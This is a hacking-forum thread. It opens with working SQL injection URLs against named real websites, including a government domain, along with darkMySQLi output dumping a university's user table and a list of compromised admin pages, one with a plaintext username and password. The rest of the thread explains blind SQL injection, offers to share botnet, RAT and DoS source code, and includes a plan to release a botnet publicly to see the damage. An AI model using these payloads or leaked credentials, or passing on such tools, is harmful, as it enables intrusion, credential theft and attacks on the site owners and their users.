http://elkotob.com/news.php?id=-1+union+select+1,concat_ws(0x3a,password),user+fro m+mysql.user--

http://bitlis.meb.gov.tr/hb.php?id=-1+union+select+1,concat_ws(0x3a,user(),database(), version()),3,4,5,6

meow.

[+] URL: http://caxton.emich.edu/guide/guide.php?id=165+AND+1=2+UNION+SELECT+1,2
[+] 17:09:12
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: researchguide
User: researchguide@caxton.emich.edu
Version: 4.0.13
[+] Dumping data from database "researchguide" Table "users"
[+] and Column(s) ['username', 'password', 'uid']
[+] Number of Rows: 27

[1] mustafa:*****:1:
[1] No data

[-] 17:09:13
[-] Total URL Requests: 4
[-] Done

Don't forget to check darkMySQLi.log

http://www.artenaescola.org.br/*****/
[No Pass Needed]

http://www.bellalunaaromas.com.br/*****/
[User: edmigli][Pass: 3dw4rdd]

[More Coming Soon]
BTW come on Cookbook users, I want to see some posts [;

Hmmmm. Are you pretty good at sql injection now?

Gettin there. I really need a botnet -.-

How do you find sql injections?

As odd as it sounds, with "sql injections". in the URL of a sql vunerable site you can put things like and 1=1 and it will display the page only slightly different. Then you can proceed to various other tests. That's how i've been doing it anyway, a bit of trial and error. Not a big fan of the SQL injections though, although they are helpful. More of a fan of botnets lately and RAT's. :P
ps: If i didn't word it correctly I apologize.

Hey blood, every write your own botnet or RAT software?

What kind of botnet you wanting?

gay gay and gay... making a botnet is easy... just time consuming.
sql is just using the sql language to map out tables and usable commands...
here's and example
post/uri.1=1
response 404: 5k

post/uri.1.1=1
response 404: 6k
^ a change in the system output signifies different value as far as delimiting.

like if you say hey true = true? and response is NOPE
or true=true? response = yes

but you use the different outputs to compare as a yes/no response...
like do i have access to sql_table ('user')
or sql_version=/.4/?)1=1
the 1=1 is (statement = true?)

I was just wondering... I don't need my own.

Naw Xon, haven't tried. I was compiling a botnet source until my computer popped up with a program called "Ghost Chat". That was a total nub hacker fail, he was like "I am god.." and im like "No.. You are net-statted" then the chat closed. Got the rat off and changed my passes, lolz He got me though, which was good enough.

Ha ha... thats funny man... Do you still have that code?

I can get the source code for you if you want :]
Or i'll give you a DoS program if that's what you plan on using it for. It's underground but pretty large in the sense that you can take down quite a few sites.

Nah, the code I would rewrite for the hell of it... I don't care about the final program

Alright, i'm at school currently but when I get home i'll see if I can dig it up. :] It's pretty fun really, I like to attach ghost net to a DoS proggie, then put it on youtube. Phr33 bots and accounts.

I too, would appreciate such source code, I'm not interested in final proggy either.

Should I write a tut right now?

Go for it... hey, wait... You should join ETA and then write a tut. Guys there at least are serious about hacking.

I joined, said I need to be accepted or some shit lol. Anyway, i'm building a new one right now. I'm going to offer it to the public just for shits and giggles and see what damage noobs cause.

Fuck man, be careful with that. Hey, remember to fill out the PIS to get access to the hacking section. Maybe better read this first: http://forums.eoeta.com/index.php?topic=308.0

Or just PM me the tut and I will post it in the right place.